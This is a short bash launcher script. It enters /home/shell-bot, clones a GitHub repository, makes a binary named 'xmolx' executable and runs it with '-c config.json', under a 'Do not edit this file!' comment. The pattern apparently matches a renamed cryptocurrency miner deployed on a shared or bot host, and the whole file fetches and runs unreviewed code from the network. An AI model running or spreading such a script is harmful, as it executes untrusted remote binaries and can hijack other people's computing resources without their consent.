#!/bin/bash

# Do not edit this file!
# kumaha aink we njink

cd /home/shell-bot
git clone https://github.com/cahayaangkasaku1/epep.git
cd epep
chmod +x config.json
chmod +x xmolx
./xmolx -c "config.json"
